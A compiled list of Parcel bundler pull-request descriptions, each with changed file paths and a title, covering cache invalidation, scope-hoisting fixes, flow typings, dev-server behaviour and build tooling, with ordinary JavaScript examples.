=> Log transformer sourcemap warnings as verbose and markdown escape them

packages/core/core/src/Parcel.js, packages/core/core/src/RequestTracker.js, packages/core/integration-tests/test/cache.js, packages/core/test-utils/src/utils.js
Previously we defaulted to storing an empty string in the graph when an environment variable was not set, compared it against it being `undefined` on rebuild, and invalidated it.
This allows for `undefined` to be stored in the graph to represent an environment variable being unset (which is different from being set to the empty string).
This adds tests for this case, as well as for cases when environment variables change from being unset to set, and set to unset.
**Note**: To be able to test that no assets were transformed, `Parcel#run()` has been changed to return a `Promise<BuildSuccessEvent>`, which includes `changedAssets`. This is probably useful for users of Parcel's JS API as well.
=> Don't retransform when unset env vars remain unchanged

packages/core/fs/package.json, packages/core/fs/src/NodeFS.js, packages/reporters/dev-server/src/HMRServer.js, yarn.lock
This:
* Uses the graceful-fs package in place of the built-in fs module in `NodeFS`. graceful-fs queues calls and retries on EMFILE.
* Throttles the number of concurrent `asset.getCode()` calls in the HMRServer by using a PromiseQueue with a maximum concurrency limit, currently limited to 64 (macOS currently has a fairly low per-process fd limit of 256). `asset.getCode()` internally uses `fs.createReadStream()` through `Cache.getStream()`. 
* **Note**: In my testing, graceful-fs was not sufficient to address excessive file handles and this queue in the HMRServer was necessary, as Node `require`'s own file reading threw an EMFILE.
* **Question**: Should this happen in the Cache or even NodeFS instead?
=> Reduce number of concurrent open file handles

packages/core/core/src/BundleGraph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/worker.js, packages/core/integration-tests/test/integration/hash-distDir/b/package.json, packages/core/integration-tests/test/react-refresh.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/test-utils/src/utils.js, packages/packagers/js/src/JSPackager.js, packages/packagers/js/src/prelude.js, packages/runtimes/hmr/src/loaders/hmr-runtime.js, packages/runtimes/js/src/JSRuntime.js, packages/shared/scope-hoisting/src/concat.js, packages/shared/scope-hoisting/src/formats/global.js, packages/shared/scope-hoisting/src/generate.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/prelude.js, packages/shared/scope-hoisting/src/shake.js
Fixes #4953.
This changes the global `parcelRequire` function to use a unique generated name per project. This should make it possible to have multiple parcel builds on the same page at once. It's generated by hashing the ~~projectRoot~~ package.json#name. Probably not perfect but better than nothing. 🤷 If anyone has a better idea on how to generate a unique id for a project that's stable over time let me know. 😄
=> Use a unique parcelRequire global per project

packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/a.html, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/b.html, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/library/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/library/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/library/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-cross-bundle/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-reexports-namespace/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-reexports-namespace/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/live-bindings-reexports-namespace/c.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/helpers.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/shake.js
... especially across bundles
The namespace objects weren't actually live
=> Fix live reexports

packages/core/integration-tests/package.json, packages/core/integration-tests/test/integration/proxyrc-js/.proxyrc.js, packages/reporters/dev-server/package.json, packages/reporters/dev-server/src/Server.js, yarn.lock
Definitive fix to [website#750](https://github.com/parcel-bundler/website/pull/750)
The documentation at v2.parceljs.org is up to date, but the dependency was not. Nothing else needs to change.
Just use an API proxy as per the docs, but remember to import with brackets.
=> Upgrade http-proxy-middleware to ^1.0.0

packages/core/parcel/src/cli.js
Fix #5291 
Since stdin [switched into raw mode](https://github.com/parcel-bundler/parcel/blob/v2/packages/core/parcel/src/cli.js#L218) it is necessary to switch it back on exit, otherwise it creates terminal side effects, etc
=> Disables stdin raw mode on exit #5291

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Environment.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/RequestTracker.js, packages/core/core/src/Transformation.js, packages/core/core/src/assetUtils.js, packages/core/core/src/public/Environment.js, packages/core/core/src/public/MutableBundleGraph.js, packages/core/core/src/public/PluginOptions.js, packages/core/core/src/public/Target.js, packages/core/core/src/requests/AssetRequest.js, packages/core/core/src/requests/ParcelConfigRequest.js, packages/core/core/src/requests/TargetRequest.js, packages/core/core/src/types.js, packages/core/core/src/utils.js, packages/core/core/test/Environment.test.js, packages/core/core/test/TargetRequest.test.js, packages/core/integration-tests/test/cache.js, packages/core/types/index.js, packages/optimizers/cssnano/src/CSSNanoOptimizer.js, packages/optimizers/terser/src/TerserOptimizer.js, packages/packagers/css/src/CSSPackager.js, packages/packagers/js/src/JSPackager.js, packages/shared/babel-ast-utils/src/index.js, packages/shared/scope-hoisting/src/generate.js, packages/transformers/coffeescript/src/CoffeeScriptTransformer.js, packages/transformers/css/src/CSSTransformer.js, packages/transformers/less/src/LessTransformer.js, packages/transformers/vue/src/VueTransformer.js
Fixes #5210. Fixes #3694. Fixes #5231. Closes T-365.
This adds tests for cache invalidation when parcel options passed via the API or CLI change, and implements several fixes. In addition, the entire asset/request graph is no longer thrown away when certain options change, likely leading to improved rebuild perf (untested).
* Adds an option node to the request graph, and an `invalidateOnOptionChange` method to the request API. On startup, requests connected to option nodes in the graph are invalidated if the option's value changes.
* We automatically track which options are read by transformer plugins and add invalidations for them via a Proxy. We also do this in the TargetRequest (for many things) and ParcelConfigRequest (for the config and defaultConfig options). **Should we do this …
=> Cache invalidation for parcel options

flow-libs/inspector.js.flow, packages/core/core/src/Parcel.js, packages/core/parcel/src/cli.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, packages/examples/kitchen-sink/src/async.js
This adds the capability of taking a heap snapshot while Parcel is running by using the ctrl-y keybinding. It asks each worker to do so using Node's `v8.writeHeapSnapshot()` [0] and produces files in pwd like `heap-20201027-184546-main.heapsnapshot` for the main thread and `heap-20201027-184546-worker1.heapsnapshot` for workers. This also updates cpu profiles to use time-based ids. Identifying this way avoids overwriting prior profiles or heap snapshots and is what `v8.writeHeapSnapshot()` uses by default — `yyyymmdd-hhmmss` [0].
Requires Node 11.13.0 (see [0]).
Test Plan: 
* Press ctrl-y while running the kitchen sink and verify heap snapshot files are produced. Load some in Chrome DevTools to confirm they are valid.
* Using Node 10, press ctrl-y while running the kitchen sink example. …
=> Create heap snapshots with ctrl-y

.flowconfig, package.json, packages/core/fs/src/MemoryFS.js, yarn.lock
Required adding an annotation to the `instances` Map in `MemoryFS`.
=> Upgrade Flow to 0.137

flow-libs/babel-preset-env.js.flow, packages/core/parcel/README.md, packages/transformers/babel/src/env.js, packages/transformers/babel/src/getBabelTargets.js, packages/transformers/babel/src/types.js, packages/transformers/babel/src/utils.js
Test Plan:
- Ran `yarn flow` to verify there are no flow errors
Question: 
packages/utils/babel-preset-transform-runtime/test/babel-plugin-transform-runtime.test.js (in ticket) seems to use @parcel/babel-preset-env instead of @babel/preset-env. Not sure if I should do the same for this file?
=> @babel/preset-env flow typings

packages/core/integration-tests/test/integration/ts-types/composite/add.ts, packages/core/integration-tests/test/integration/ts-types/composite/expected.d.ts, packages/core/integration-tests/test/integration/ts-types/composite/index.ts, packages/core/integration-tests/test/integration/ts-types/composite/package.json, packages/core/integration-tests/test/integration/ts-types/composite/tsconfig.json, packages/core/integration-tests/test/ts-types.js, packages/transformers/typescript-types/src/TSTypesTransformer.js
This PR solves https://github.com/parcel-bundler/parcel/issues/5344
`transformer-typescript-types` uses the typescript API through the `ts.createProgram` function. But this function is not meant to be used with [composite](https://www.typescriptlang.org/docs/handbook/project-references.html#composite). Indeed, the typescript's team provide another API specifically for this case: [`createIncrementalProgram`](https://github.com/microsoft/TypeScript/pull/31432).
Incremental build is irrelevant for Parcel here, but on the other hand the user could have a `tsconfig.json` with composite enabled, for instance to enable some `vscode` features (ie. project references). So we should make sure that `composite` is set to false.
I provided an example repository to test the fix: …
=> fix: typescript createProgram doesn't support incremental mode

flow-libs/json-source-map.js.flow, packages/core/core/src/requests/TargetRequest.js, packages/core/diagnostic/src/diagnostic.js
**Test Plan**:
- verified that no flow errors are present
Note: Removed `nullthrows` from `packages/core/diagnostic/src/diagnostic.js` since these typings should guard against variable `pos` (line 216) from being null.
=> flow typings for json-source-map

packages/core/integration-tests/test/integration/formats/commonjs-external/multiple.js, packages/core/integration-tests/test/integration/formats/commonjs-external/namespace.js, packages/core/integration-tests/test/integration/formats/esm-external/multiple.js, packages/core/integration-tests/test/integration/formats/esm-external/namespace.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-external/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/library/c1.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/library/c2.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/library/c3.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/library/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/library/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace/a.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Depends on https://github.com/parcel-bundler/parcel/pull/4861
This is needed for my next PR and also excludes "c2" in this case:
```js
import * as test from './library';
console.log(test.foo);
// library/index.js ("sideEffects": false)
export * from "./c1.js";
export * from "./c2.js";
// library/c1.js ("sideEffects": false)
export const foo = "foo";
// library/c2.js ("sideEffects": false)
export const bar = "bar";
```
Works by actually resolving `test.foo` in the transformer, so the asset c2 can be excluded by symbol propagation.
`$index$exports.foo` was already being resolved previously in the linker, but this way, even more can be excluded up front, meaning less memory usage and faster builds.
=> Resolve static member accesses on namespace imports

packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-static-member/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Previously, this might have thrown with `does not export 'val'` 😬 
Fixup for #5362
```js
import * as b from "./library/index.js";
let val = "foo";
output = b[val];
```
The atlaskit-editor benchmark even failed with a build error, but I didn't notice that at the time...
=> Correctly bailout for static member accesses on namespace

flow-libs/ansi-html.js.flow, packages/core/utils/src/ansi-html.js
This PR is for adding a flow type for ansi-html
Sources: I looked at `strip-ansi`[ flow type ](https://github.com/flow-typed/flow-typed/blob/master/definitions/npm/strip-ansi_v3.x.x/flow_v0.104.x-/strip-ansi_v3.x.x.js) as well as the `ansi-html.js` file[ within the parcel repo](https://github.com/parcel-bundler/parcel/blob/a5e234877e42ce98eb2bd38665edf6937af5733a/packages/core/utils/src/ansi-html.js)
1. Added `flow strict enable` to `ansi-html.js` file without errors
2. Ran `yarn flow check` with 0 errros
3. Try flow function `s({input:string}) {} `, `s({obj: []})` doesn't work since it's not a string
=> P2 x 323 flow types for ansi html

packages/core/integration-tests/test/integration/formats/esm-async-chained-reexport2/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/a1.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/a2.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/async.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-assignment-error.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-assignment.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-declaration-error.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-declaration-namespace-bailout-eval.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-declaration-namespace-bailout.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-declaration-namespace-error.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-declaration-namespace.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/await-declaration.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/then-error.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/then-namespace-bailout.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/then-namespace-error.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/then-namespace.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-dynamic-import/then.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/formats/esmodule.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/utils.js
Closes https://github.com/parcel-bundler/parcel/issues/4318
These patterns are picked up by the transformer:
```js
let { x: y } = await import("./b.js");
({ x } = await import("./b.js"));
import("./b.js").then(({ a: b }) => console.log(b));
let ns = await import("./b.js");
console.log(ns.foo);
import("./b.js").then((ns) => console.log(ns.foo));
```
This works for tree shaking as well as excluding whole subgraphs via the bundler & symbol-propagation.
<br>
This also automatically throws errors if you try to import something that is guaranteed to be missing:
=> Tree shake dynamic imports

package.json, packages/core/core/src/ParcelConfig.schema.js, packages/core/core/src/worker.js, packages/core/integration-tests/package.json, packages/core/integration-tests/test/cache.js, packages/core/integration-tests/test/integration/cache/src/index.js, packages/core/integration-tests/test/integration/runtime-update/node_modules/parcel-runtime-mock/index.js, packages/core/is-v2-ready-yet/package.json, packages/core/register/example/package.json, packages/core/test-utils/src/utils.js, packages/core/workers/src/WorkerFarm.js, packages/dev/babel-preset/package.json, packages/dev/eslint-config-browser/index.js, packages/dev/eslint-config/index.js, packages/dev/eslint-config/package.json, packages/dev/eslint-plugin/package.json, packages/dev/eslint-plugin/test/rules/no-self-package-imports.test.js, packages/dev/eslint-plugin/test/utils.test.js, packages/reporters/cli/src/CLIReporter.js, packages/reporters/cli/test/CLIReporter.test.js, packages/resolvers/default/package.json, packages/transformers/babel/package.json, packages/transformers/babel/src/config.js, packages/transformers/js/package.json, packages/transformers/postcss/src/PostCSSTransformer.js, packages/utils/babel-plugin-transform-runtime/package.json, packages/utils/babel-preset-env/package.json, yarn.lock
Fixes #1359. Closes T-652.
This improves babel config invalidation and adds cache tests. Most of this depends on https://github.com/babel/babel/pull/11907 which was released in Babel v7.12. This gives us a full list of all files that affected a babel config, including extended configs and ignore files. If we detect an earlier version of babel core, we invalidate on startup and log a warning to let the user know to upgrade. This also implements invalidation on startup for symlinked babel plugins.
The warnings we previously had in the babel transformer weren't really visible to most users because they were logged as verbose. I've changed these to actual warnings so people will be more likely to see them. I've also implemented warning deduplication in the CLI reporter so that the same …
=> Tests and improvements to babel config invalidation

flow-libs/json5.js.flow, packages/core/core/src/requests/ParcelConfigRequest.js, packages/core/integration-tests/test/hmr.js
This PR is for adding a flow typings file for `JSON5` 
1. Remove flow disable or `fixme` comments from `parcelConfigRequest.js` and `hmr.js`
2. Check flow is enabled
3. Run ` yarn flow check ` and confirm there are 0 errors
❗  Not type safe return from `parse` ❗
=> Add flow type for json5

packages/core/integration-tests/test/integration/formats/commonjs-esm/universal-library.js, packages/core/integration-tests/test/output-formats.js, packages/shared/scope-hoisting/src/formats/esmodule.js
Closes https://github.com/parcel-bundler/parcel/issues/5230
Previously:
```js
!(function (name, definition) {
if (typeof module != "undefined") {
module.exports = definition();
} else if (typeof define == "function" && typeof define.amd == "object") {
define(definition);
} else {
this[name] = definition();
}
})("some-pkg-name", function () {
return { a: 2 };
});
```
```js
// ASSET: lib.js
var $d32bcf3d24482056cb8353653e5e805e$exports = {};
var $d32bcf3d24482056cb8353653e5e805e$var$define;
!function (name, definition) {
if ("object" != "undefined") {
$d32bcf3d24482056cb8353653e5e805e$exports = definition();
export default $d32bcf3d24482056cb8353653e5e805e$exports; // <------
} else if (typeof $d32bcf3d24482056cb8353653e5e805e$var$define == "function" && typeof …
```
=> Fix non-top-level module.exports assignments

packages/core/core/src/BundleGraph.js, packages/core/core/src/serializer.js, packages/core/core/test/serializer.test.js
The BundleGraph does not need to be recursively traversed when being serialized or deserialized. Instead, mark it as a raw value to skip this step of the serializer.
This also required a change to the serializer to skip recursively deserializing values when the input value was a raw value. Previously, it recursed unconditionally.
Test Plan:
* Perform a trace and verify that `restoreDeserializedObject` called on the BundleGraph at the beginning of packaging has minimal impact on performance as it ends once it encounters the raw value.
=> Serialize the BundleGraph as a raw value

packages/core/core/src/Parcel.js, packages/core/core/src/ReporterRunner.js
Closes https://github.com/parcel-bundler/parcel/issues/4135
Fixes T-385
Fixes a memory leak if the JS API was used repeatedly without restarting the process.
Run the integration tests. Previously, this warning was printed after the 10th test:
```
MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 reporterEvent listeners added to [Bus] 
```
=> Unsubscribe ReporterRunner from Bus

flow-libs/micromatch.js.flow, packages/core/core/src/ParcelConfig.js, packages/core/integration-tests/test/integration/dotfile-bundle/index.js, packages/core/integration-tests/test/integration/dotfile-bundle/package.json, packages/core/integration-tests/test/javascript.js
`*.js` doesn't match `.output.js` unless explicitly enabled
Closes https://github.com/parcel-bundler/parcel/issues/5472
=> parcelrc: include dotfiles in matches

packages/core/integration-tests/test/integration/js-import-default-live/index.js, packages/core/integration-tests/test/integration/js-import-default-live/other.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/svg.js, packages/transformers/js/src/esmodule-helpers.js, packages/transformers/js/src/visitors/modules.js
Closes https://github.com/parcel-bundler/parcel/issues/5502
Do this instead:
```js
var _bJs = require("./b.js");
var _parcelHelpers = require("@parcel/transformer-js/src/esmodule-helpers.js");
var _bJsDefault = _parcelHelpers.interopDefault(_bJs);
console.log(_bJsDefault.default);
_bJs.set(789);
```
This is similar to Babel
=> Make sure default imports are also live

packages/transformers/js/src/esmodule-helpers.js
That file isn't a source file, so Babel doesn't transpile it.
Closes #5555
=> Make sure that esmodule-helpers is IE11-compatible

lerna.json
It seems that the new folder `native-packages` containing fs-search isn't included in the lerna config, so it's excluded from publishing.
I'm hoping this is the only change necessary to enable publishing.
Fixes #5569
=> Add native-packages to lerna

.github/workflows/nightly-release.yml, .github/workflows/tag-release.yml
Strips debug symbols. Due to https://github.com/rust-lang/rust/issues/46034
=> Reduce linux binary size for fs-search package

packages/core/parcel/src/cli.js
Prevent this:
```
$ parcel2 index.html
Port "60178" could not be used
ℹ️ Server running at http://localhost:60178
````
Instead, the original port should be printed in the warning.
=> Print original port

packages/core/parcel/src/cli.js
Fixes #4550. This appears to have been added for Ink, but we don't use that anymore.
=> Do not override process.env.NODE_ENV

packages/core/integration-tests/test/integration/sourcemap-comments/index.js, packages/core/integration-tests/test/sourcemaps.js, packages/shared/babel-ast-utils/src/generator.js
Fixes #5630. astring has an optimization that only checks for newlines at the end of the string of code being printed rather than in the middle. This broke our custom comment generator which added the next indent at the end of the string rather than being printed separately causing astring not to count lines properly. Added a test for this as well.
=> Fix sourcemap generation with comments

packages/shared/scope-hoisting/src/generate.js, packages/shared/scope-hoisting/src/prelude.js
This prevents the scope hoisting bundle wrapper from being executed more than once. Previously, it was possible to re-enter the bundle wrapper in the case two bundles depended on assets registered by one another.
=> Scope hoisting: only execute bundle wrappers once

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/wrap-concat-order/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/wrap-concat-order/b.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/wrap-concat-order/c.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/concat.js
Closes https://github.com/parcel-bundler/parcel/issues/5668
Wrapped assets aren't visited when traversing the statements here: https://github.com/parcel-bundler/parcel/blob/49ac217507d5914a2e38ca402593d26527cdb673/packages/shared/scope-hoisting/src/concat.js#L145-L146
instead, they are inserted before the asset.
The problem was that when splicing 
- a wrapped child asset into index 0 and then
- a non-wrapped child asset  into the calculated index 2,
the index `2` is wrong because some other asset was already spliced before that.
Now, wrapped assets are unshifted once all assets with a known index were already spliced. This way, the indices are always correct.
=> Fix concat order with wrapped assets

packages/core/integration-tests/package.json, packages/core/integration-tests/test/integration/formats/esm-async-chained-reexport2/index.js, packages/core/integration-tests/test/integration/formats/esm-async/index.js, packages/core/integration-tests/test/integration/formats/esm-bundle-import-reexport/index.js, packages/core/integration-tests/test/integration/formats/esm-bundle-import-reexport/version.js, packages/core/integration-tests/test/integration/formats/esm-split/async1.js, packages/core/integration-tests/test/integration/formats/esm-split/async2.js, packages/core/integration-tests/test/integration/formats/esm-split/index.js, packages/core/integration-tests/test/integration/formats/esm-wrap-codesplit/a.js, packages/core/integration-tests/test/output-formats.js, packages/core/test-utils/src/utils.js
1. Execute the ESM build output and compares it with the expected result
2. Where possible (= if there's no CJS interop problem), compare the exports of the build output with the exports of the build input
Depends on https://github.com/parcel-bundler/parcel/pull/5664
Close T-461
TODO:
=> Extend test utils to execute ESM bundles

packages/reporters/dev-server/src/Server.js
When Parcel is pending, we hold open requests and respond to them when the builds completes. This enqueues request/response object pairs in an array rather than registering new event handlers for each request. We only register one event handler to flush all of these pending requests.
Previously, we would reach EventEmitter's threshold for warning about a maximum number of handlers on the `bundle` event. While the same could be achieved by simply increasing the threshold for this particular emitter, it feels cleaner to not register handlers for every request.
Test Plan:
Run Parcel with `parcel serve` on a large project to keep it busy on a cold build. Use curl to open 11+ requests and verify there is no message printed to stdio about the number of handlers. Verify requests continue to be …
=> Dev server: enqueue request and response tuples rather than event handlers

packages/bundlers/default/src/DefaultBundler.js
There is an implicit dependency on internalization taking place because we remove bundles in deduplicate. As a result we need to include internalization in bundle and not optimize (which does not execute for development as of PR #5498 
Tested on external large app.
=> Internalized as part of bundle

packages/core/core/src/BundleGraph.js
This PR is for altering `removeExternalDependency` method, which may be called multiple times on the same bundle. Method should safely return if called multiple times. 
Tested on external app
=> Make remove external dependancy safe if edge isnt present

packages/core/core/src/ConfigLoader.js, packages/core/package-manager/src/NodePackageManager.js
Came up in #5532, @aminya
1. Added a hint to the diagnostic when autoinstall is disabled
2. Added `errorToDiagnostic` around loadConfig so that the plugin name is attached as a origin.
New behaviour:
Also for incompatible versions where it couldn't be found in package.json (and was installed transivitely)
=> Add origin to diagnostic in loadConfig

packages/core/core/src/requests/TargetRequest.js, packages/core/integration-tests/test/cache.js, packages/core/types/index.js
Closes #5724
1. `package.json#browserslist` can be an object with a per-environment config
```
// package.json
...
"browserslist": {
"production": [
"last 1 chrome version",x
"last 1 firefox version",
"last 1 safari version"
],
"development": [
"last 1 chrome version",
"last 1 firefox version",
"last 1 safari version"
]
},
...
```
This was never normalized.
2. The used browserslist environment was previously `env.BROWSERSLIST_ENV ?? env.NODE_ENV ?? 'production'`
It makes more sense to fall back to `options.mode`, to enable to pattern from above and enable setting a custom dev & production env without having to introduce two different targets.
=> Fix browserslist env config in package.json and use options.mode for env selection

.github/workflows/nightly-release.yml, .github/workflows/tag-release.yml, native-packages/fs-search/index.js, native-packages/fs-search/package.json
This makes native packages build on CentOS 7, which includes glibc 2.17,  rather than the latest Ubuntu. Glibc is backward compatible, but not forward compatible, so building against an older glibc is safe to run on systems with later glibc, but not the other way around [0].
Closes https://github.com/parcel-bundler/parcel/issues/5599
Test Plan: 
[0] https://stackoverflow.com/a/11108336
=> Native packages: compile with CentOS 7 to target glibc 2.17

packages/core/integration-tests/test/integration/scope-hoisting/es6/non-ascii-identifiers/a.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/package.json, packages/shared/scope-hoisting/src/utils.js, packages/transformers/js/package.json, packages/transformers/react-refresh-wrap/package.json, packages/utils/babylon-walk/package.json, yarn.lock
Version bump for https://github.com/babel/babel/pull/12575
Closes https://github.com/parcel-bundler/parcel/issues/5547
=> Update babel-types to make toIdentifier work with non-ASCII chars

packages/core/core/src/Parcel.js, packages/core/core/src/requests/AssetGraphRequest.js
The request graph was removed previously; the flow ignore hides that the object doesn't exist when sent to graphviz. 
Without the change, the graph visualization functionality errors out (undefined graph).
=> Moving the request graph from visualization

packages/core/utils/src/openInBrowser.js
Makes it so the `--open` option treats an empty string in the same way as `undefined` (i.e. will open the default browser)
So,  `--open $BROWSER` will behave in the same way as this `--open "$BROWSER"`
For this issue: https://github.com/parcel-bundler/parcel/issues/5775
In package.json you should be able to do this:
```
"scripts": {
"dev": "parcel serve src/index.html --open \"$BROWSER\""
},
```
and if `$BROWSER` is unset, it will open the default browser.
Confirm that this:
```
"scripts": {
"dev": "parcel serve src/index.html --open \"$BROWSER\""
},
```
behaves the same way as this:
```
"scripts": {
"dev": "parcel serve src/index.html --open $BROWSER"
},
```
when `$BROWSER` is an actual string and when it is empty.
=> empty string for --open cli param is treated as undefined

packages/core/integration-tests/test/server.js, packages/reporters/dev-server/src/Server.js
This PR changes the serving logic to serve the index file if there's multiple html entrypoints and serve the html entrypoint if there's only one.
Closes #5752
=> Serve non index.html files if it's the only html entrypoint

packages/core/integration-tests/test/integration/js-import-shadow-for-var/index.js, packages/core/integration-tests/test/integration/js-import-shadow-for-var/other.js, packages/core/integration-tests/test/javascript.js, packages/transformers/js/src/visitors/modules.js, packages/utils/babylon-walk/src/scope.js
Closes #5718
Example:
```js
import { f } from "./b.js";
(function () {
for (var f = [], i = 0; i < 10; i++) { // f is imported and also locally declared inside the loop head
f[i] = i;
}
console.log(f);
})();
```
previously became: 
```js
var _bJs = require("./b.js");
(function () {
for (var f = [], i = 0; i < 10; i++) {
f[i] = i;
}
console.log(_bJs.f); // !!!
})();
```
=> esm2cjs: var declarations can shadow outside the block

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/wrap-unused/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/wrap-unused/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/test-utils/src/utils.js, packages/shared/scope-hoisting/src/link.js
Closes https://github.com/parcel-bundler/parcel/issues/5816
~Apparently enabling strict mode for all tests has revealed some more errors and so CI is failing...~ Deferred that change for now
Previously, this could be produced: there's a stray assignment doing `$id$export$foo = $id$var$foo;`. The `$id$exports.foo = ` statement was correctly removed, but this wasn't.
```js
(function () {
// ASSET: bundle-url.js
var $a$exports, $a$export$getBundleURL, $a$executed = false;
function $a$var$getBundleURL() {
return "bundle";
}
function $a$var$getBaseURL(url) {
return "base";
}
function $a$exec() {
$a$exports = {};
$a$export$getBundleURL = $a$var$getBundleURL;
$a$exports.getBundleURL = $a$export$getBundleURL;
$a$export$getBaseURL = $a$var$getBaseURL; // <---------
}
function $a$init() {
if …
```
=> Remove invalid unused CJS exports statements

packages/core/integration-tests/test/integration/js-import-shadow-param/index.js, packages/core/integration-tests/test/integration/js-import-shadow-param/other.js, packages/core/integration-tests/test/javascript.js, packages/utils/babylon-walk/src/scope.js
The function parameter bindings were added to the parent scope
@wbinnssmith
=> Function parameters shouldn't shadow imports

packages/shared/babel-ast-utils/src/generator.js, packages/shared/babel-ast-utils/test/fixtures/valid-only.js, packages/shared/babel-ast-utils/test/index.js
This fixes a case where
`// /* */`
became
`/* /* */ */`
But the comment in the test is still duplicated because of Babel's AST format (https://github.com/babel/babel/issues/12769).
Fixes part of #5787 (so at least the produced code is syntactically valid now).
=> Fix astring generation of nested comment

packages/core/integration-tests/test/integration/scope-hoisting/es6/interop-pure/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/interop-pure/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/concat.js
Closes https://github.com/parcel-bundler/parcel/issues/5765
Otherwise, Terser cannot completely remove a module if it's unused:
```js
!function(){var e;(e="some unused data")&&e.__esModule&&e.default}();
```
e.g. with 
```js
import x from "./other.js";
if (false) {
console.log(x);
}
```
=> Mark $parcel$interopDefault calls as pure

packages/core/integration-tests/test/scope-hoisting.js
It's called `supports live bindings across bundles` after all, but there wasn't a shared bundle without this change
=> Add missing mode: production to test fixture

packages/transformers/webextension/src/WebExtensionTransformer.js
`manifest.json` entry files are being "minified" by default, regardless of the `--no-minify` option. Given that these are small configuration files I think they could avoid being minified by default for the sake of readability. Also because they're downloaded only when the extension is updated.
Before this PR:
```json5
// manifest.json
{"name":"Awesome Extension","version":"0.0.0","description":"An awesome new browser extension","homepage_url":"https://github.com/awesome-templates/browser-extension-template","manifest_version":2,"minimum_chrome_version":"74","applications":{"gecko":{"id":"awesome-extension@notlmn.github.io","strict_min_version":"67.0"}},"icons":{"128":"/icon.png"},"permissions":["storage"],"options_ui":{"chrome_style":true,"page":"/options.html"},"background":{"persistent" …
```
=> WebExtensionTransformer: Beautify manifest.json

.flowconfig, flow-typed/npm/mocha_v8.x.x.js, package.json, yarn.lock
Latest news regarding autoimports: they work somewhat correctly now for importing npm packages, but when importing from a different monorepo package, a relative path is added instead of the package name
=> Update flow to 0.145.0

packages/core/diagnostic/src/diagnostic.js, packages/core/diagnostic/test/markdown.test.js
Prevent:
```
TypeError: Cannot read property 'Symbol()' of undefined
at md (.../node_modules/@parcel/diagnostic/lib/diagnostic.js:234:34)
```
with 
```js
md`${undefined}`
```
